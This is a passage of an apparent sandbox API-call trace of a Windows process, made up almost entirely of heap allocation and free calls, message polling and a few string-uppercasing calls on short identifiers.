lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0087.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69670 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f70 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0087.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0087.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0087.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0087.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0087.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b80 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f78b8 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0087.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0087.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0087.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0087.881] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0087.881] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0087.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.881] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a698b0 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8f28) returned 0x37c0048 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a698b0 | out: hHeap=0x2af0000) returned 1 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8f28) returned 0x37c8f78 [0087.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0087.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0087.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0087.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0087.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0087.883] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0087.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0087.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.883] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0087.884] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0087.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0087.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0087.884] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0087.884] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0087.884] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0087.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0087.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f68 [0087.884] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0087.885] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.885] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 